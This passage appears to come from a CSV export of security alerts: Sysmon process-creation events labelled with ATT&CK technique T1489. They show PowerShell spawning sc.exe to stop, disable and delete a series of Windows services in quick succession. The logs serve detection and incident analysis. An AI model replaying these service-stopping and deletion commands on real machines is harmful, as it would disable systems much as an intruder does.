Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelp64 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.061",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.809 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010ca873000} +ProcessId: 4508 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.811913200Z"",""eventRecordID"":""3796"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.809\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010ca873000}\r\nProcessId: 4508\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.809"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010ca873000}"",""processId"":""4508"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.388",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.615 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010eb823000} +ProcessId: 5936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.622022500Z"",""eventRecordID"":""3793"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.615\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010eb823000}\r\nProcessId: 5936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.615"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010eb823000}"",""processId"":""5936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.358",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.494 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010a2803000} +ProcessId: 7488 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.498751200Z"",""eventRecordID"":""3791"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.494\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010a2803000}\r\nProcessId: 7488\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.494"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010a2803000}"",""processId"":""7488"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.342",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.452 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010c57f3000} +ProcessId: 1988 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.466241300Z"",""eventRecordID"":""3790"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.452\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010c57f3000}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.452"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010c57f3000}"",""processId"":""1988"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.285",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.208 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-00108e7c3000} +ProcessId: 6112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.220338200Z"",""eventRecordID"":""3787"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.208\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-00108e7c3000}\r\nProcessId: 6112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.208"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-00108e7c3000}"",""processId"":""6112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.240",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.972 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010157a3000} +ProcessId: 736 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.019741000Z"",""eventRecordID"":""3784"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.972\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010157a3000}\r\nProcessId: 736\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.972"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010157a3000}"",""processId"":""736"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.218",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.938 +ProcessGuid: 